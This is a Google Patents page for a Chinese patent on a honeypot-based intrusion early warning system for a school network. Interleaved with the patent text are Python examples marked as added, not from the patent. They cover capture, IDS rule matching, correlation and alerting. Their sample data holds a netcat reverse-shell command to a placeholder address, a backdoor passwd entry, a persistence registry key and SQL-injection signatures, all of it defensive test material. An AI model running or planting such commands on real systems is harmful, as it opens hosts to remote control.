CN108366088A - A kind of information security early warning system for Instructing network - Google Patents
Info
- Publication number
- CN108366088A (application CN201711466279.2A)
- Authority
- CN
- China
- Prior art keywords
- module
- data
- signal end
- honey
- early warning
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/12—Protocols specially adapted for proprietary or special-purpose networking environments, e.g. medical networks, sensor networks, networks in vehicles or remote metering networks
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computing Systems (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Medical Informatics (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The invention discloses an information security early warning system for a teaching network, comprising a honeynet host, a data analysis server and a monitoring terminal. The signal port of the honeynet host is connected to a wireless router; the signal port of the wireless router is connected to the data analysis server and also to the monitoring terminal. The honeynet host comprises a honeynet gateway and a virtual honeypot group, the interaction port of the honeynet gateway being connected to the virtual honeypot group. The signal port of the honeynet host is also connected to a data analysis system, and the data port of the honeynet host is connected to a database system. The control port of the monitoring terminal is connected to a monitoring management system. The whole system uses dynamic defense techniques: it monitors, captures and analyzes network information in real time, captures and monitors the attacks of potential intruders so as to learn their motives and intrusion methods, and can also perform forensic analysis of network intrusions.
Description
Technical field
The present invention relates to the field of teaching-network information security, and specifically to an information security early warning system for a teaching network.
Background technology
A school is a place for teaching and educating people, and the teaching network, as a means of informatization, plays a very important role there. However, security problems of teaching networks are becoming increasingly acute and have become the main threat to school information technology education. As the internet is put to the test, unhealthy information, illegal intrusion and various other insecure factors erode the pure land of the school with ever greater harm.
For example, the invention patent with application No. 201510727383.7, titled "a linked information security early warning system for power information systems", can monitor equipment status in real time and provide linked early warning of security incidents; the indicators processed by collection and analysis and the results of events are presented on a large screen together with remote video surveillance of the equipment, providing linked information security early warning and guaranteeing the security of equipment and network.
However, existing information security early warning systems for teaching networks have the following defects:
(1) An active early warning system ultimately serves information network security, and a stable and reliable information network is the important guarantee of the safe operation of the teaching network; but current information networks cannot actively defend against unknown security risks;
(2) The structures that existing teaching networks adopt for security protection are relatively complex and their automatic defense capability is poor; without any prior indication they cannot determine the location of weak links and vulnerabilities.
Invention content
To overcome the shortcomings of the prior art, the present invention provides an information security early warning system for a teaching network which effectively solves the problems raised in the background technology.
The technical solution adopted by the present invention to solve the technical problem is:
An information security early warning system for a teaching network, comprising a honeynet host, a data analysis server and a monitoring terminal. The signal port of the honeynet host is connected to a wireless router; the signal port of the wireless router is connected to the data analysis server and is also connected to the monitoring terminal. The honeynet host comprises a honeynet gateway and a virtual honeypot group, and the interaction port of the honeynet gateway is connected to the virtual honeypot group. The signal port of the honeynet host is also connected to a data analysis system, the data port of the honeynet host is also connected to a database system, and the control port of the monitoring terminal is connected to a monitoring management system.
The data analysis system comprises a data capture module and an intrusion detection module. The output of the data capture module is connected to a parsing module, the signal port of the parsing module is connected to a reassembly and conversion module, the output of the reassembly and conversion module is connected to the intrusion detection module, and the output of the intrusion detection module is connected to a tracing module and to a warning module.
Further, the input of the intrusion detection module is connected to a rule processing module.
Further, the rule processing module comprises a rule matching module and a rule file detection module, the output of the rule file detection module being connected to the rule matching module.
Further, the signal port of the wireless router is also connected to a monitoring management server and to a database server.
Further, the warning module comprises a master controller; the signal port of the master controller is connected to a threshold setting module, the signal port of the threshold setting module is connected to a program setting module, and the signal port of the master controller is connected to the parsing module.
Further, the monitoring management system comprises a database decision support system, which comprises a data source module and a data warehouse module; the signal port of the data source module is connected to the data capture module, the output of the data source module is connected to an intermediate database module, and the output of the data source module is connected through a data flow to the data warehouse module.
Further, the signal port of the intermediate database module is connected to a data incremental update module, and the signal port of the data incremental update module is connected to the data warehouse module.
Further, the output of the data warehouse module is connected to a host analysis processing module, and the output of the host analysis processing module is connected to the warning module.
Further, the signal port of the host analysis processing module is connected through a data flow to the intermediate database module.
Compared with the prior art, the beneficial effects of the invention are:
(1) The information security early warning system of the invention is externally an open application system and internally a modular closed system. It provides interface data for a real-time network monitoring system, conveniently shares real-time monitoring and warning data, substantially raises the security protection level of the teaching network system, and can virtualize as many kinds of production and operating systems as possible so as to provide all-round security protection;
(2) The security defense system of the invention uses dynamic defense techniques. It monitors, captures and analyzes network information in real time, captures and monitors the attacks of potential intruders so as to learn their motives and intrusion methods, and can also perform forensic analysis of network intrusions.
Description of the drawings
Fig. 1 is the overall structure diagram of the invention;
Fig. 2 is the schematic diagram of the data analysis system of the invention;
Fig. 3 is the schematic diagram of the warning module of the invention;
Fig. 4 is the schematic diagram of the monitoring management system of the invention.
Reference numerals:
1- honeynet host; 2- data analysis server; 3- monitoring terminal; 4- monitoring management system; 5- data analysis system; 6- wireless router; 7- monitoring management server; 8- database server; 9- database system;
101- honeynet gateway; 102- virtual honeypot group;
401- host analysis processing module; 402- data warehouse module; 403- data source module; 404- data incremental update module; 405- intermediate database module; 406- database decision support system;
501- data capture module; 502- intrusion detection module; 503- parsing module; 504- reassembly and conversion module; 505- tracing module; 506- warning module; 507- rule processing module; 508- rule matching module; 509- rule file detection module; 510- master controller; 511- threshold setting module; 512- program setting module.
Specific implementation mode
The technical solutions in the embodiments of the present invention will be described clearly and completely below with reference to the drawings of the embodiments. Obviously, the described embodiments are only some, not all, of the embodiments of the present invention. Based on the embodiments of the present invention, all other embodiments obtained by those of ordinary skill in the art without creative effort fall within the scope of protection of the present invention.
As shown in Figures 1 to 4, the present invention provides an information security early warning system for a teaching network, comprising a honeynet host 1, a data analysis server 2 and a monitoring terminal 3. The signal port of the honeynet host 1 is connected to a wireless router 6; the signal port of the wireless router 6 is also connected to a monitoring management server 7 and to a database server 8; the signal port of the wireless router 6 is connected to the data analysis server 2 and also to the monitoring terminal 3. The system uses dynamic defense techniques: it monitors, captures and analyzes network information in real time, captures and monitors the attacks of potential intruders so as to learn their motives and intrusion methods, and can also perform forensic analysis of network intrusions. Its operating principle is to use the three core elements of a honeynet, data control, data capture and data analysis, to achieve real-time tracking and capture of network risks.
Further, the honeynet host 1 comprises a honeynet gateway 101 and a virtual honeypot group 102, the interaction port of the honeynet gateway 101 being connected to the virtual honeypot group 102. First, honeynet data control is performed on the honeynet gateway: the honeynet gateway 101 places no restriction on packets entering the honeynet, so that an intruder can easily break into it, but strictly controls any attack the intruder launches outward using the honeynet as a springboard. The signal port of the honeynet host 1 is also connected to a data analysis system 5, and the data port of the honeynet host 1 is also connected to a database system 9, which provides logging and data storage services and stores all information captured by the honeynet system (HNS).
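An added example (not from the patent) of the outbound "data control" rule described for the honeynet gateway 101: inbound traffic is admitted without restriction, while outbound connections from each honeypot are counted per hour and dropped once a budget is exhausted, so a compromised honeypot cannot serve as a springboard. The honeynet address range, the per-protocol limits and the sample connections are assumptions made for this example.

```python
from collections import defaultdict
from dataclasses import dataclass, field

HONEYNET_PREFIX = "10.0.5."   # assumed address range of the virtual honeypot group


@dataclass
class Conn:
    ts: int      # seconds since epoch (constructed values below)
    src: str
    dst: str
    dport: int
    proto: str   # "tcp", "udp" or "icmp"


@dataclass
class GatewayPolicy:
    # assumed per-protocol budget of outbound connections per honeypot per hour
    limit_per_hour: dict = field(default_factory=lambda: {"tcp": 15, "udp": 20, "icmp": 50})
    counters: dict = field(default_factory=lambda: defaultdict(int))

    def decide(self, c: Conn) -> str:
        src_in = c.src.startswith(HONEYNET_PREFIX)
        dst_in = c.dst.startswith(HONEYNET_PREFIX)
        if not src_in:
            return "allow"          # traffic entering the honeynet is never restricted
        if dst_in:
            return "allow"          # honeypot-to-honeypot traffic stays inside the honeynet
        # outbound from a honeypot: count per (source, protocol, hour bucket)
        key = (c.src, c.proto, c.ts // 3600)
        self.counters[key] += 1
        if self.counters[key] > self.limit_per_hour.get(c.proto, 0):
            return "drop"           # budget exhausted: the springboard is cut off
        return "allow"


def apply_policy(conns, policy=None):
    """Run every connection through the gateway; return (decision log, number dropped)."""
    policy = policy or GatewayPolicy()
    log = [(c.ts, c.src, c.dst, c.dport, c.proto, policy.decide(c)) for c in conns]
    return log, sum(1 for entry in log if entry[-1] == "drop")


# Constructed sample: one inbound SSH probe, then the compromised honeypot
# 10.0.5.21 opens 17 outbound SMB connections within the same hour.
SAMPLE = [Conn(1_000_000, "203.0.113.9", "10.0.5.21", 22, "tcp")] + [
    Conn(1_000_000 + i, "10.0.5.21", "198.51.100.%d" % (i + 1), 445, "tcp")
    for i in range(17)
]

if __name__ == "__main__":
    for entry in apply_policy(SAMPLE)[0]:
        print(*entry)
```

The budget is deliberately counted per hour bucket rather than per connection burst: a real honeywall also rate-limits and may rewrite outbound exploit payloads, but the counting rule above is the part that stops the honeynet from becoming an attack platform.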
The control port of the monitoring terminal 3 is connected to a monitoring management system 4. The data capture requirement is met through the monitoring management system 4 and carried out by the honeynet gateway 101 and the virtual honeypot group 102 deployed on the honeypot hosts. Packets entering the honeynet are alerted on according to rules and alert logs are generated; at the same time the raw traffic packets are captured and NetFlow flow data is generated. On each honeypot host a self-hiding host behaviour monitoring module is installed, which logs and records changes inside the honeypot host, such as changes of network connections, processes, registry entries and files, captures sample files, and transmits them to the honeynet gateway through a covert protocol, from where they are finally sent to the log server.
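An added example (not from the patent) of the host behaviour monitoring step above, reduced to its core: two snapshots of a honeypot's processes, network connections, files and registry keys are compared, and every change becomes a log record of the kind forwarded to the gateway and log server. The snapshots are constructed (Linux and Windows categories are mixed only so that every category is exercised); the self-hiding and covert-transport aspects are not modelled.

```python
import hashlib
import json


def file_hash(content: bytes) -> str:
    """Files are tracked by content hash rather than by mtime, which an intruder can reset."""
    return hashlib.sha256(content).hexdigest()


def diff_snapshot(before: dict, after: dict, host: str, ts: str) -> list:
    """Compare two snapshots {category: {key: value}} and return one log record
    per added / removed / modified entry, ordered by category and key."""
    records = []
    for category in sorted(set(before) | set(after)):
        old, new = before.get(category, {}), after.get(category, {})
        for key in sorted(set(old) | set(new)):
            if key not in old:
                change = "added"
            elif key not in new:
                change = "removed"
            elif old[key] != new[key]:
                change = "modified"
            else:
                continue
            records.append({"ts": ts, "host": host, "category": category, "key": key,
                            "change": change, "old": old.get(key), "new": new.get(key)})
    return records


def to_jsonl(records: list) -> str:
    """Serialize records as JSON lines, the form handed to the gateway / log server."""
    return "\n".join(json.dumps(r, sort_keys=True) for r in records)


# Constructed snapshots of honeypot 10.0.5.21 before and after a compromise.
BEFORE = {
    "process": {"1:init": "/sbin/init", "742:sshd": "/usr/sbin/sshd"},
    "network": {"tcp:0.0.0.0:22": "LISTEN"},
    "file": {"/etc/passwd": file_hash(b"root:x:0:0:root:/root:/bin/bash\n")},
    "registry": {},   # only populated on Windows honeypots
}
AFTER = {
    "process": {"1:init": "/sbin/init", "742:sshd": "/usr/sbin/sshd",
                "913:nc": "/usr/bin/nc -e /bin/sh 198.51.100.7 4444"},
    "network": {"tcp:0.0.0.0:22": "LISTEN",
                "tcp:10.0.5.21:51022->198.51.100.7:4444": "ESTABLISHED"},
    "file": {"/etc/passwd": file_hash(b"root:x:0:0:root:/root:/bin/bash\nbd:x:0:0::/:/bin/sh\n")},
    "registry": {"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\updater": "C:\\Temp\\u.exe"},
}


def run_monitor():
    return diff_snapshot(BEFORE, AFTER, "honeypot-21", "2018-01-05T10:00:00Z")


if __name__ == "__main__":
    print(to_jsonl(run_monitor()))
```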
The monitoring terminal 3 is mainly used for communication between the components of the active early warning system of the information network. The administrator of the active early warning system accesses the system management region from the management area and performs daily management and log analysis through the web-based management interface of the monitoring management system.
Further, the data analysis system 5 comprises a data capture module 501 and an intrusion detection module 502. The working environment of the data capture module 501 is Ethernet: because Ethernet transmits data by broadcast, a network card in promiscuous mode can capture the packets transmitted on the segment, providing the basic data source for the system (on a switched network this requires a mirror/SPAN port or a network tap rather than plain promiscuous listening). The output of the data capture module 501 is connected to a parsing module 503: the captured packets are forwarded through the operating system's low-level driver to the system protocol stack, where the raw packets are decoded and analyzed in bottom-up order of the protocol stack, serving the processing of the subsequent modules. The signal port of the parsing module 503 is connected to a reassembly and conversion module 504, which processes the packets produced by the decoding module. The output of the reassembly and conversion module 504 is connected to the intrusion detection module 502, which performs rule matching on the converted packets to detect many different kinds of intrusion behaviour and, by continuously examining the network system, discovers threats and weaknesses, laying the technical foundation for early warning, response and tracing.
The output of the intrusion detection module 502 is connected to a tracing module 505 and to a warning module 506, and the input of the intrusion detection module 502 is connected to a rule processing module 507. The rule processing module 507 comprises a rule matching module 508 and a rule file detection module 509, the output of the rule file detection module 509 being connected to the rule matching module 508. Rule matching first requires loading the rule file: the rule file is the knowledge base of network attacks, and only when rules are present in the base can intrusion behaviour be recognized. Next the rule file is parsed, a rule tree is built, and rule matching is performed.
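The capture, decode, reassemble and rule-match chain of modules 501, 503, 504, 502 and 507-509 described in the two paragraphs above, as an added Python example that is not part of the patent. Frames are decoded bottom-up (Ethernet, IPv4, TCP), segments are reassembled per flow in sequence order, and a rule file is validated and parsed into a tree indexed by protocol and destination port before matching. The rule syntax (Snort-like but simplified), the rules, the addresses and the frames are constructed for illustration; the rule file deliberately contains two malformed lines so the rule file detection step has something to reject.

```python
import re
import struct
from collections import defaultdict

# --- rule file (constructed, simplified Snort-like syntax) -------------------
RULE_FILE = """\
# knowledge base of attack signatures; one rule per line
alert tcp any any -> any 80 (msg:"SQL injection UNION SELECT"; content:"UNION SELECT"; nocase; sid:1000001;)
alert tcp any any -> any 80 (msg:"Path traversal"; content:"../../"; sid:1000002;)
alert tcp any any -> any 22 (msg:"libssh client banner"; content:"SSH-2.0-libssh"; sid:1000003;)
alert tcp any any -> any 80 (msg:"broken rule without sid"; content:"x";)
this line is not a rule at all
"""
RULE_RE = re.compile(r'^alert\s+(\w+)\s+\S+\s+\S+\s*->\s*\S+\s+(\S+)\s*\((.*)\)\s*$')


def load_rules(text):
    """Rule file detection + parsing: reject malformed lines, build a rule tree
    indexed by protocol and destination port (None means 'any')."""
    tree, errors = defaultdict(lambda: defaultdict(list)), []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            errors.append((n, "unparseable rule"))
            continue
        proto, dport, body = m.groups()
        opts = {}
        for opt in filter(None, (o.strip() for o in body.split(";"))):
            k, _, v = opt.partition(":")
            opts[k.strip()] = v.strip().strip('"')
        if "content" not in opts or "sid" not in opts:
            errors.append((n, "rule lacks content or sid"))
            continue
        port = None if dport == "any" else int(dport)
        tree[proto][port].append({"sid": int(opts["sid"]), "msg": opts.get("msg", ""),
                                  "content": opts["content"].encode(), "nocase": "nocase" in opts})
    return tree, errors


def parse_frame(frame):
    """Decode bottom-up: Ethernet -> IPv4 -> TCP. Returns None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    doff = (tcp[12] >> 4) * 4
    return {"src": ".".join(map(str, ip[12:16])), "dst": ".".join(map(str, ip[16:20])),
            "sport": sport, "dport": dport, "seq": seq, "payload": tcp[doff:]}


def reassemble(packets):
    """Group segments per flow and join payloads in sequence order; duplicate
    retransmissions are dropped (overlap trimming is omitted for brevity)."""
    flows = defaultdict(dict)
    for p in packets:
        flows[(p["src"], p["sport"], p["dst"], p["dport"])].setdefault(p["seq"], p["payload"])
    return {flow: b"".join(segs[s] for s in sorted(segs)) for flow, segs in flows.items()}


def match_rules(tree, flow, data):
    """Walk the rule tree: port-specific rules first, then 'any'-port rules."""
    hits = []
    for rule in tree["tcp"][flow[3]] + tree["tcp"][None]:
        hay, needle = data, rule["content"]
        if rule["nocase"]:
            hay, needle = hay.lower(), needle.lower()
        if needle in hay:
            hits.append((rule["sid"], rule["msg"], flow))
    return hits


def detect(frames, rule_text=RULE_FILE):
    tree, errors = load_rules(rule_text)
    packets = [p for p in map(parse_frame, frames) if p]
    alerts = []
    for flow, data in reassemble(packets).items():
        alerts.extend(match_rules(tree, flow, data))
    return alerts, errors


def build_frame(src, dst, sport, dport, seq, payload):
    """Helper to construct sample frames (minimal headers, zero checksums)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


# Constructed traffic: an injection request split over two out-of-order segments
# (plus a retransmission of the first), a libssh scanner banner, and a benign request.
SAMPLE_FRAMES = [
    build_frame("203.0.113.9", "10.0.5.21", 40001, 80, 1022, b"ON SELECT 1,2,3 HTTP/1.1\r\n\r\n"),
    build_frame("203.0.113.9", "10.0.5.21", 40001, 80, 1000, b"GET /item.php?id=1 UNI"),
    build_frame("203.0.113.9", "10.0.5.21", 40001, 80, 1000, b"GET /item.php?id=1 UNI"),
    build_frame("203.0.113.9", "10.0.5.21", 40002, 22, 500, b"SSH-2.0-libssh_0.8.1\r\n"),
    build_frame("198.51.100.4", "10.0.5.21", 51000, 80, 1, b"GET / HTTP/1.1\r\n\r\n"),
]

if __name__ == "__main__":
    print(detect(SAMPLE_FRAMES))
```

The point of reassembling before matching is visible in the sample: the signature "UNION SELECT" straddles two segments that arrive out of order, so per-packet matching would miss it, which is exactly the evasion that stream reassembly in an IDS exists to defeat.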
Further, the warning module 506 monitors the network data flow to identify and record intrusions and destructive access operations, and to discover network violation patterns and unauthorized network access attempts. When such a pattern or attempt is found, the early warning system reacts according to the system security policy: by analyzing and processing the data, the system determines the alert level, provides several alarm types, classifies threat events, determines the threat source, and produces threat statistics and analysis.
Further, the data analysis system 5 collects all kinds of data and logs through the log server, including network logs, host logs, raw traffic packets, flow data and sample files, performs correlation analysis on them and, combined with further offline analysis techniques, fulfils the "data analysis" requirement of the honeynet.
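An added example (not from the patent) of the correlation analysis mentioned above: each network alert is joined with the host-side change records of the targeted honeypot that fall within a short time window after it, and alerts with no host evidence are set aside for offline analysis. The alert and host records below are constructed, and their field names are chosen for this example.

```python
from collections import defaultdict


def correlate(net_alerts, host_events, window=30):
    """Attach to each network alert the host changes recorded on the targeted
    honeypot within `window` seconds after it; return (incidents, unmatched)."""
    by_host = defaultdict(list)
    for e in host_events:
        by_host[e["host"]].append(e)
    incidents, unmatched = [], []
    for a in sorted(net_alerts, key=lambda a: a["ts"]):
        related = [e for e in by_host[a["dst"]] if 0 <= e["ts"] - a["ts"] <= window]
        if related:
            incidents.append({"alert": a, "host_changes": related})
        else:
            unmatched.append(a)
    return incidents, unmatched


# Constructed network alerts (from the IDS) and host records (from the honeypot agent).
NET_ALERTS = [
    {"ts": 1000, "src": "203.0.113.9", "dst": "10.0.5.21", "sid": 1000001, "msg": "SQL injection"},
    {"ts": 3000, "src": "198.51.100.4", "dst": "10.0.5.21", "sid": 2000001, "msg": "port scan"},
]
HOST_EVENTS = [
    {"ts": 1012, "host": "10.0.5.21", "category": "process", "change": "added", "key": "913:nc"},
    {"ts": 1015, "host": "10.0.5.21", "category": "network", "change": "added",
     "key": "tcp:10.0.5.21:51022->198.51.100.7:4444"},
    {"ts": 5000, "host": "10.0.5.21", "category": "file", "change": "modified", "key": "/etc/passwd"},
]


def run_correlation():
    return correlate(NET_ALERTS, HOST_EVENTS)


if __name__ == "__main__":
    incidents, unmatched = run_correlation()
    for inc in incidents:
        print(inc["alert"]["msg"], "->", [(e["category"], e["key"]) for e in inc["host_changes"]])
    print("unmatched:", [a["msg"] for a in unmatched])
```

The window only looks forward from the alert: a file change observed long after the injection (ts 5000 above) is not attributed to it, which keeps a noisy honeypot from turning every later change into "evidence" for an unrelated alert.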
Further, the warning module 506 comprises a master controller 510; the signal port of the master controller 510 is connected to a threshold setting module 511, the signal port of the threshold setting module 511 is connected to a program setting module 512, and the signal port of the master controller 510 is connected to the parsing module 503.
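An added example (not from the patent) of the warning module 506 as described in the paragraphs above: a master controller applies a configurable threshold over a sliding time window, assigns an alert level per event category, escalates the level when one source exceeds the threshold, and keeps per-source threat statistics. The category-to-severity table, the threshold, the window and the events are assumptions made for this example.

```python
from collections import defaultdict, deque

# assumed base severity per event category and the level names used for alarms
SEVERITY = {"recon": 1, "web-attack": 2, "exploit": 3, "malware": 4}
LEVEL_NAMES = {1: "info", 2: "low", 3: "medium", 4: "high", 5: "critical"}


class WarningModule:
    """Master controller: `threshold` events from one source and category within
    `window` seconds raise the alert level by one; statistics are kept per source."""

    def __init__(self, threshold=5, window=60):
        self.threshold, self.window = threshold, window       # threshold setting
        self.recent = defaultdict(deque)                      # (src, category) -> timestamps
        self.stats = defaultdict(lambda: defaultdict(int))    # src -> category -> count

    def process(self, event):
        key = (event["src"], event["category"])
        q = self.recent[key]
        q.append(event["ts"])
        while event["ts"] - q[0] > self.window:               # slide the window forward
            q.popleft()
        self.stats[event["src"]][event["category"]] += 1
        level = SEVERITY.get(event["category"], 1)
        escalated = len(q) >= self.threshold
        if escalated:
            level = min(level + 1, 5)
        return {"ts": event["ts"], "src": event["src"], "sid": event["sid"],
                "category": event["category"], "level": LEVEL_NAMES[level],
                "count_in_window": len(q), "escalated": escalated}


def run(events, threshold=5, window=60):
    """Feed events in time order; return the warnings and the per-source statistics."""
    wm = WarningModule(threshold, window)
    warnings = [wm.process(e) for e in sorted(events, key=lambda e: e["ts"])]
    summary = {src: dict(cats) for src, cats in wm.stats.items()}
    return warnings, summary


# Constructed IDS events: a scanner firing six recon alerts within 25 s, then one
# web attack from the same address, and a single probe from another address.
EVENTS = [{"ts": 100 + 5 * i, "src": "203.0.113.9", "sid": 2000001, "category": "recon"}
          for i in range(6)] + [
    {"ts": 140, "src": "203.0.113.9", "sid": 1000001, "category": "web-attack"},
    {"ts": 150, "src": "198.51.100.4", "sid": 2000001, "category": "recon"},
]

if __name__ == "__main__":
    warnings, summary = run(EVENTS)
    for w in warnings:
        print(w["ts"], w["src"], w["category"], w["level"], w["count_in_window"])
    print(summary)
```

Escalation is keyed on (source, category) rather than on the source alone, so a slow scanner that also sends one real exploit is reported at the exploit's own severity instead of being buried under the scan's count.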
Further, the tracing module 505 uses information traceback techniques; its aim is to determine the trail of the attacker, locate the attack source and infer the route the attacker took through the network.
Further, the monitoring management system 4 comprises a database decision support system 406, which comprises a data source module 403 and a data warehouse module 402. The data source module 403 is mainly used to collect the network data of the wide area network, that is, the raw data received; its signal port is connected to the data capture module 501 and its output to an intermediate database module 405. The intermediate database module 405 is mainly responsible for processing the text files of raw data, eliminating dirty data and storing the result in the intermediate database, thereby providing standardized data for the subsequent modules.
Further, the output of the data source module 403 is connected through a data flow to the data warehouse module 402. The signal port of the intermediate database module 405 is connected to a data incremental update module 404, whose signal port is connected to the data warehouse module 402. The output of the data warehouse module 402 is connected to a host analysis processing module 401, whose output is connected to the warning module 506. The signal port of the host analysis processing module 401 is connected through a data flow to the intermediate database module 405.
The data incremental update module 404 performs the incremental update of the cubes in the data warehouse. Data in the network are real-time, but in the security early warning system the data in the data warehouse used for analysis are updated periodically: in each cycle a newly generated group of structured text files is produced, the system adds the data in these files to the intermediate database and performs the incremental update of the data warehouse. In the present system the data warehouse is updated incrementally with a period of one day.
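An added example (not from the patent) of the intermediate-database cleaning step (405) and the daily incremental update of the warehouse cube (404) described above: each day's structured text file is parsed, dirty rows are rejected, and the surviving rows are added to a cube keyed by (day, source, signature); re-applying a file that was already loaded is a no-op, so a re-run of the daily job cannot double-count. The file format, the dirty-row rules, the idempotency by file id and the sample files are assumptions.

```python
import ipaddress
from collections import defaultdict


def clean_rows(text):
    """Intermediate database step: parse one structured text file
    (day,src,sid,count per line) and discard dirty rows with a reason."""
    good, bad = [], []
    for n, line in enumerate(text.splitlines(), 1):
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 4:
            bad.append((n, "field count"))
            continue
        day, src, sid, cnt = parts
        try:
            ipaddress.ip_address(src)            # rejects junk such as 999.1.1.1
            good.append((day, src, int(sid), int(cnt)))
        except ValueError:
            bad.append((n, "bad address or number"))
    return good, bad


class Warehouse:
    def __init__(self):
        self.cube = defaultdict(int)   # (day, src, sid) -> alert count
        self.loaded = set()            # file ids already applied

    def incremental_update(self, file_id, rows):
        """Apply one period's rows to the cube; a file already loaded is skipped."""
        if file_id in self.loaded:
            return 0
        for day, src, sid, cnt in rows:
            self.cube[(day, src, sid)] += cnt
        self.loaded.add(file_id)
        return len(rows)

    def rollup(self, dim):
        """Host analysis view: total the cube along one dimension (day, src or sid)."""
        idx = {"day": 0, "src": 1, "sid": 2}[dim]
        out = defaultdict(int)
        for key, v in self.cube.items():
            out[key[idx]] += v
        return dict(out)


def load_daily(wh, file_id, text):
    rows, bad = clean_rows(text)
    return wh.incremental_update(file_id, rows), bad


# Constructed daily files as the data source module would hand them over;
# DAY1 contains an invalid address, DAY2 a stray header line.
DAY1 = """2018-01-05,203.0.113.9,2000001,40
2018-01-05,203.0.113.9,1000001,3
2018-01-05,198.51.100.4,2000001,5
2018-01-05,999.1.1.1,2000001,7
"""
DAY2 = """day,src,sid,count
2018-01-06,203.0.113.9,1000001,2
2018-01-06,192.0.2.77,1000003,1
"""


def build_warehouse():
    wh, badlog = Warehouse(), []
    for fid, text in (("2018-01-05", DAY1), ("2018-01-06", DAY2)):
        applied, bad = load_daily(wh, fid, text)
        badlog.extend((fid, n, why) for n, why in bad)
    return wh, badlog


if __name__ == "__main__":
    wh, badlog = build_warehouse()
    print(wh.rollup("src"), wh.rollup("day"), badlog)
```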
Further, the host analysis processing module 401 displays the cube information, dimension information and measures of the data warehouse.
It is obvious to those skilled in the art that the invention is not limited to the details of the above exemplary embodiments, and that the invention can be realized in other specific forms without departing from its spirit or essential attributes. Therefore, from whatever point of view, the embodiments are to be considered illustrative and not restrictive, and the scope of the invention is defined by the appended claims rather than by the above description; all variations falling within the meaning and range of equivalents of the claims are intended to be included in the invention. Any reference signs in the claims shall not be construed as limiting the claims concerned.
Claims (9)
1. An information security early warning system for a teaching network, comprising a honeynet host (1), a data analysis server (2) and a monitoring terminal (3), characterized in that: the signal port of the honeynet host (1) is connected to a wireless router (6); the signal port of the wireless router (6) is connected to the data analysis server (2) and is also connected to the monitoring terminal (3); the honeynet host (1) comprises a honeynet gateway (101) and a virtual honeypot group (102), the interaction port of the honeynet gateway (101) being connected to the virtual honeypot group (102); the signal port of the honeynet host (1) is also connected to a data analysis system (5), the data port of the honeynet host (1) is also connected to a database system (9), and the control port of the monitoring terminal (3) is connected to a monitoring management system (4);
the data analysis system (5) comprises a data capture module (501) and an intrusion detection module (502); the output of the data capture module (501) is connected to a parsing module (503), the signal port of the parsing module (503) is connected to a reassembly and conversion module (504), the output of the reassembly and conversion module (504) is connected to the intrusion detection module (502), and the output of the intrusion detection module (502) is connected to a tracing module (505) and to a warning module (506).
2. The information security early warning system for a teaching network according to claim 1, characterized in that: the input of the intrusion detection module (502) is connected to a rule processing module (507).
3. The information security early warning system for a teaching network according to claim 2, characterized in that: the rule processing module (507) comprises a rule matching module (508) and a rule file detection module (509), the output of the rule file detection module (509) being connected to the rule matching module (508).
4. The information security early warning system for a teaching network according to claim 1, characterized in that: the signal port of the wireless router (6) is also connected to a monitoring management server (7) and to a database server (8).
5. The information security early warning system for a teaching network according to claim 1, characterized in that: the warning module (506) comprises a master controller (510); the signal port of the master controller (510) is connected to a threshold setting module (511), the signal port of the threshold setting module (511) is connected to a program setting module (512), and the signal port of the master controller (510) is connected to the parsing module (503).
6. The information security early warning system for a teaching network according to claim 1, characterized in that: the monitoring management system (4) comprises a database decision support system (406), which comprises a data source module (403) and a data warehouse module (402); the signal port of the data source module (403) is connected to the data capture module (501), the output of the data source module (403) is connected to an intermediate database module (405), and the output of the data source module (403) is connected through a data flow to the data warehouse module (402).
7. The information security early warning system for a teaching network according to claim 6, characterized in that: the signal port of the intermediate database module (405) is connected to a data incremental update module (404), and the signal port of the data incremental update module (404) is connected to the data warehouse module (402).
8. The information security early warning system for a teaching network according to claim 1, characterized in that: the output of the data warehouse module (402) is connected to a host analysis processing module (401), and the output of the host analysis processing module (401) is connected to the warning module (506).
9. The information security early warning system for a teaching network according to claim 1, characterized in that: the signal port of the host analysis processing module (401) is connected through a data flow to the intermediate database module (405).
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201711466279.2A CN108366088A (en) | 2017-12-28 | 2017-12-28 | A kind of information security early warning system for Instructing network |
Publications (1)
Publication Number | Publication Date |
---|---|
CN108366088A true CN108366088A (en) | 2018-08-03 |
Family
ID=63010788
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201711466279.2A Pending CN108366088A (en) | 2017-12-28 | 2017-12-28 | A kind of information security early warning system for Instructing network |
Country Status (1)
Country | Link |
---|---|
